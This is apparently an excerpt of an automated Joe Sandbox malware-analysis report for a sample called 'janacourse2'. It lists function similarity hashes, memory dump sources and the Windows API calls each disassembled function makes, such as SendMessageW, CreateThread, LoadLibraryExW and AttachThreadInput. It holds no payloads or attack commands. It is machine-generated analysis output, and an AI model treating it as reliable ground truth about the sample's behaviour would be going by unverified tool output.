                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: lstrcmpilstrcpylstrlen
                                                                                                            • String ID: cdecl
                                                                                                            • API String ID: 4031866154-3896280584
                                                                                                            • Opcode ID: f8af95a7388631d74da240636a4c0639ca4cecd92022745e74c5be56a5978efe
                                                                                                            • Instruction ID: 9a839eb442920e9571a91052508ef650111ceacbdd63bcbd0a5d75d7e81b7271
                                                                                                            • Opcode Fuzzy Hash: f8af95a7388631d74da240636a4c0639ca4cecd92022745e74c5be56a5978efe
                                                                                                            • Instruction Fuzzy Hash: 7C112C3A200302ABDB155F38C844D7B77E6FF85350B40402EF982C7268EB359905C791
                                                                                                            APIs
                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 01047D0B
                                                                                                            • SetWindowLongW.USER32(00000000,000000F0,?), ref: 01047D2A
                                                                                                            • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 01047D42
                                                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0102B7AD,00000000), ref: 01047D6B
                                                                                                              • Part of subcall function 00FC9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00FC9BB2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$Long
                                                                                                            • String ID:
                                                                                                            • API String ID: 847901565-0
                                                                                                            • Opcode ID: 4c76dcb85b4b6174bf561ba82a47f172c0658467204cdb7c20839ea58713721d
                                                                                                            • Instruction ID: af3a6a7a87c682408de106786b74608be5ca684958129637e1f4bd4cc2aaf80d
                                                                                                            • Opcode Fuzzy Hash: 4c76dcb85b4b6174bf561ba82a47f172c0658467204cdb7c20839ea58713721d
                                                                                                            • Instruction Fuzzy Hash: D011D2B2215615AFDB20AF2CCC84A6A3BA5BF45360B118378F9F9C72E0D7359951CB80
                                                                                                            APIs
                                                                                                            • SendMessageW.USER32(?,00001060,?,00000004), ref: 010456BB
                                                                                                            • _wcslen.LIBCMT ref: 010456CD
                                                                                                            • _wcslen.LIBCMT ref: 010456D8
                                                                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 01045816
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend_wcslen
                                                                                                            • String ID:
                                                                                                            • API String ID: 455545452-0
                                                                                                            • Opcode ID: 8447211197d05930f6343d3a7e19f4261ef3e06daadd59ee97ddabf58aa7b675
                                                                                                            • Instruction ID: 3d93d3c10a826dc1f7eab27f604f2842976d09a44b879efd3d851b271cbdbf66
                                                                                                            • Opcode Fuzzy Hash: 8447211197d05930f6343d3a7e19f4261ef3e06daadd59ee97ddabf58aa7b675
                                                                                                            • Instruction Fuzzy Hash: 991103F5600208A7EB20DF65DCC1AEE3BACEF05364B00407AFA85DA081EB74D640CB60
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 0a0d392158d77651cf1b205dca71212903d88269a790de22cc535a8435df1eac
                                                                                                            • Instruction ID: 17f00632a999bc74f516eff29feabdc87afc1d49eb753d924f7410cf98f10681
                                                                                                            • Opcode Fuzzy Hash: 0a0d392158d77651cf1b205dca71212903d88269a790de22cc535a8435df1eac
                                                                                                            • Instruction Fuzzy Hash: 0E01A2B260A69A3EF731257B6CC1F2B761CEF813B8B310329F521511D6DB798C047160
                                                                                                            APIs
                                                                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 01011A47
                                                                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 01011A59
                                                                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 01011A6F
                                                                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 01011A8A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend
                                                                                                            • String ID:
                                                                                                            • API String ID: 3850602802-0
                                                                                                            • Opcode ID: 1b84d2acb9ff0eab1b70a3c6dbf53dbaba303f399193ccae443ac119eb4dd144
                                                                                                            • Instruction ID: 95a2f854a42774ff36aaf73af5f147cb1b2ba800843af3e84a3f9763a182d845
                                                                                                            • Opcode Fuzzy Hash: 1b84d2acb9ff0eab1b70a3c6dbf53dbaba303f399193ccae443ac119eb4dd144
                                                                                                            • Instruction Fuzzy Hash: 0211397AD00219FFEB11DBA8C985FADBBB8EB08754F200091EA00B7294D6716E50DB94
                                                                                                            APIs
                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 0101E1FD
                                                                                                            • MessageBoxW.USER32(?,?,?,?), ref: 0101E230
                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0101E246
                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0101E24D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                            • String ID:
                                                                                                            • API String ID: 2880819207-0
                                                                                                            • Opcode ID: 23e73bea376fcfacf3e4500a3d84c441559e6555f49d6e3ef0150299fdf0a41c
                                                                                                            • Instruction ID: 89eb12cb8b11317a76563c4d8bd96fded07c78d1ff5e1df41905b60ad14040e2
                                                                                                            • Opcode Fuzzy Hash: 23e73bea376fcfacf3e4500a3d84c441559e6555f49d6e3ef0150299fdf0a41c
                                                                                                            • Instruction Fuzzy Hash: 05112BB6A04254BFD7229FACDD45ADE7FACAF46310F048255FD94D3285D2B9C90087A0
                                                                                                            APIs
                                                                                                            • CreateThread.KERNEL32(00000000,?,00FDCFF9,00000000,00000004,00000000), ref: 00FDD218
                                                                                                            • GetLastError.KERNEL32 ref: 00FDD224
                                                                                                            • __dosmaperr.LIBCMT ref: 00FDD22B
                                                                                                            • ResumeThread.KERNEL32(00000000), ref: 00FDD249
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Thread$CreateErrorLastResume__dosmaperr
                                                                                                            • String ID:
                                                                                                            • API String ID: 173952441-0
                                                                                                            • Opcode ID: 0a8b53a89214ba34563f83cb974e2d6def4b953a01c376d0b01a32b994c97749
                                                                                                            • Instruction ID: 224035662d669e266da431c094b1481719d8a2d8e96cb0741bbd95ceedb361a1
                                                                                                            • Opcode Fuzzy Hash: 0a8b53a89214ba34563f83cb974e2d6def4b953a01c376d0b01a32b994c97749
                                                                                                            • Instruction Fuzzy Hash: 9801F9768051047BD7216BA5DC09BAE7B6EDF82332F18031AF925923D0DB75C905E7A0
                                                                                                            APIs
                                                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00FB604C
                                                                                                            • GetStockObject.GDI32(00000011), ref: 00FB6060
                                                                                                            • SendMessageW.USER32(00000000,00000030,00000000), ref: 00FB606A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateMessageObjectSendStockWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 3970641297-0
                                                                                                            • Opcode ID: 0e7ce88681db281fd9832318248699f7c09521648574f548000558d0a9d94f3d
                                                                                                            • Instruction ID: 7ee76662f6cbfd8d993508317fdef340f57d3a34c964abbbaa879b2c549e282d
                                                                                                            • Opcode Fuzzy Hash: 0e7ce88681db281fd9832318248699f7c09521648574f548000558d0a9d94f3d
                                                                                                            • Instruction Fuzzy Hash: 771161B3502548BFEF229F969D44EFA7B69FF093A4F040115FA5492110D73A9C60EF90
                                                                                                            APIs
                                                                                                            • ___BuildCatchObject.LIBVCRUNTIME ref: 00FD3B56
                                                                                                              • Part of subcall function 00FD3AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 00FD3AD2
                                                                                                              • Part of subcall function 00FD3AA3: ___AdjustPointer.LIBCMT ref: 00FD3AED
                                                                                                            • _UnwindNestedFrames.LIBCMT ref: 00FD3B6B
                                                                                                            • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00FD3B7C
                                                                                                            • CallCatchBlock.LIBVCRUNTIME ref: 00FD3BA4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                                            • String ID:
                                                                                                            • API String ID: 737400349-0
                                                                                                            • Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                                                                                            • Instruction ID: f0edf08cb407e4859df5f797cf20c300daa63f414c5de571fc7dfd6a7705e908
                                                                                                            • Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                                                                                            • Instruction Fuzzy Hash: 52012D32500148BBDF126F95CC46DEB3B6AEF88754F08401AFE4856221C736E961EBA1
                                                                                                            APIs
                                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00FB13C6,00000000,00000000,?,00FE301A,00FB13C6,00000000,00000000,00000000,?,00FE328B,00000006,FlsSetValue), ref: 00FE30A5
                                                                                                            • GetLastError.KERNEL32(?,00FE301A,00FB13C6,00000000,00000000,00000000,?,00FE328B,00000006,FlsSetValue,01052290,FlsSetValue,00000000,00000364,?,00FE2E46), ref: 00FE30B1
                                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00FE301A,00FB13C6,00000000,00000000,00000000,?,00FE328B,00000006,FlsSetValue,01052290,FlsSetValue,00000000), ref: 00FE30BF
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: LibraryLoad$ErrorLast
                                                                                                            • String ID:
                                                                                                            • API String ID: 3177248105-0
                                                                                                            • Opcode ID: bfe36360524650c3076d9d44eb17f50a828a72c02d85b081afce90e426ef3144
                                                                                                            • Instruction ID: 3011afab7b876b71ba6e7145b7771c9c957536b63e678d0e224712eeb2c59fc4
                                                                                                            • Opcode Fuzzy Hash: bfe36360524650c3076d9d44eb17f50a828a72c02d85b081afce90e426ef3144
                                                                                                            • Instruction Fuzzy Hash: 44012B76702262ABDB318A7B9D8CA677B98AF45B75B200620FB45E3144C736D901D7E0
                                                                                                            APIs
                                                                                                            • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 0101747F
                                                                                                            • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 01017497
                                                                                                            • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 010174AC
                                                                                                            • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 010174CA
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Type$Register$FileLoadModuleNameUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 1352324309-0
                                                                                                            • Opcode ID: 6722914d0fdf05ae64a152903ffaa93683ce6378fa169d1b74fc13dbc92f3ce1
                                                                                                            • Instruction ID: 712a0ae8211ceec448b087787fa7486ad2332877b96042009056c62e4e498951
                                                                                                            • Opcode Fuzzy Hash: 6722914d0fdf05ae64a152903ffaa93683ce6378fa169d1b74fc13dbc92f3ce1
                                                                                                            • Instruction Fuzzy Hash: 1311A1B52423009BF7308F58DE48B967FFCEB40B00F008569EA96D6155DF79E904CB50
                                                                                                            APIs
                                                                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0101ACD3,?,00008000), ref: 0101B0C4
                                                                                                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0101ACD3,?,00008000), ref: 0101B0E9
                                                                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0101ACD3,?,00008000), ref: 0101B0F3
                                                                                                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0101ACD3,?,00008000), ref: 0101B126
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CounterPerformanceQuerySleep
                                                                                                            • String ID:
                                                                                                            • API String ID: 2875609808-0
                                                                                                            • Opcode ID: 34f0325f155ecdd9f714a18a0dd03134aea41f1f0ff92f55abd6cd33e2b06163
                                                                                                            • Instruction ID: 4743d5be49f21fe29f69951b33827881667e1a1ca3d16e45835f577dcc05f0cf
                                                                                                            • Opcode Fuzzy Hash: 34f0325f155ecdd9f714a18a0dd03134aea41f1f0ff92f55abd6cd33e2b06163
                                                                                                            • Instruction Fuzzy Hash: E611AD70C0251CE7DF10AFE4EA88AEEBF78FF0A310F114086E9C1B2189CB3996508B51
                                                                                                            APIs
                                                                                                            • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 01012DC5
                                                                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 01012DD6
                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 01012DDD
                                                                                                            • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 01012DE4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 2710830443-0
                                                                                                            • Opcode ID: 784a6bc2d38f3e505bfcbcbfa28627b810f0e1ce171b2490000b996d1d2d7fd2
                                                                                                            • Instruction ID: 7fb38b95315b62ce6a25278acd260c9f15f0784aa1f0863e9d20391e360a60dd
                                                                                                            • Opcode Fuzzy Hash: 784a6bc2d38f3e505bfcbcbfa28627b810f0e1ce171b2490000b996d1d2d7fd2
                                                                                                            • Instruction Fuzzy Hash: EDE092B52022287BE7302BB6DE4DFEB3E6CEF47BA1F504015F245D10849AAAD440C7B0
                                                                                                            APIs
                                                                                                              • Part of subcall function 00FC9639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00FC9693
                                                                                                              • Part of subcall function 00FC9639: SelectObject.GDI32(?,00000000), ref: 00FC96A2
                                                                                                              • Part of subcall function 00FC9639: BeginPath.GDI32(?), ref: 00FC96B9
                                                                                                              • Part of subcall function 00FC9639: SelectObject.GDI32(?,00000000), ref: 00FC96E2
                                                                                                            • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 01048887
                                                                                                            • LineTo.GDI32(?,?,?), ref: 01048894
                                                                                                            • EndPath.GDI32(?), ref: 010488A4
                                                                                                            • StrokePath.GDI32(?), ref: 010488B2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                            • String ID:
                                                                                                            • API String ID: 1539411459-0
                                                                                                            • Opcode ID: c1e001fb0c2e9ff399bfba9f80a5d87d0a4b60113d5ca1e8fb4cf920377de1f5
                                                                                                            • Instruction ID: 9b220b6bcb86f9099422d7b023e196a032713acefdf5aabc2e42c49ed7f7ca50
                                                                                                            • Opcode Fuzzy Hash: c1e001fb0c2e9ff399bfba9f80a5d87d0a4b60113d5ca1e8fb4cf920377de1f5
                                                                                                            • Instruction Fuzzy Hash: E3F09A3A006258BBFB221E94AE4AFCE3E59AF06310F008104FA81610D5C3BA1111DBA9
                                                                                                            APIs
                                                                                                            • GetSysColor.USER32(00000008), ref: 00FC98CC
                                                                                                            • SetTextColor.GDI32(?,?), ref: 00FC98D6
                                                                                                            • SetBkMode.GDI32(?,00000001), ref: 00FC98E9
                                                                                                            • GetStockObject.GDI32(00000005), ref: 00FC98F1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Color$ModeObjectStockText
                                                                                                            • String ID:
                                                                                                            • API String ID: 4037423528-0
                                                                                                            • Opcode ID: cb9fa8452e26f173f1c2c939a5a900700d37a57ee5d4203fdd2f7247f8ac7f1a
                                                                                                            • Instruction ID: c2fc687cc1839e08fe3ed32557d9478eebb87903e06d3ceac991a4600208973c
                                                                                                            • Opcode Fuzzy Hash: cb9fa8452e26f173f1c2c939a5a900700d37a57ee5d4203fdd2f7247f8ac7f1a
